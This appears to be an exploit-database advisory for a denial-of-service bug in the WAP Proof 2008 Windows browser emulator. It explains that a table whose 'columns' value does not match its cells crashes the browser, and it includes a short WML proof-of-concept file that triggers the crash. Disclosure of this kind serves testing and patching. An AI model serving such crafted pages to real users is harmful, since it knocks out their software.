WAP Proof 2008 - Denial of Service

Author: Orion Einfold
type: dos
platform: windows
port: 
date_added: 2012-09-08 
date_updated: 2012-09-09 
verified: 1 
codes: OSVDB-85951 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwproof2008pro.exe

[] Description :

WAP Proof is an universal emulator of a WAP browser for Microsoft Windows. It is designed for the preview and debugging of mobile websites and provide support for WML, XHTML, cHTML and HTML pages and a compatible GSM modems, such as Wavecom, Alcatel, Motorola, Nokia, Siemens, Sagem, Sony Ericsson .. etc.
Vendor Homepage: http://www.wap-proof.com/

[] Technical details:

The <td> and <tr> tags defines a table row or a standard cell in a HTML table alongwith the column="" attribute in the <table> element
and any incorrect integer value for column attribute that not fitt for the enumeration of tags may usually cause to crash the browser.



[] POC to /bug.wml:


<?xml version="1.0" encoding="utf-8"?>

<wml><card id="orion" title="einfold">
<p><table title="Tab" columns="1" align="LCR" class="AAA" id="AAA">
<tr><td>one</td><td>two</td><td>three</td></tr>
</table></p></card></wml>

<!-- Orion Einfold -->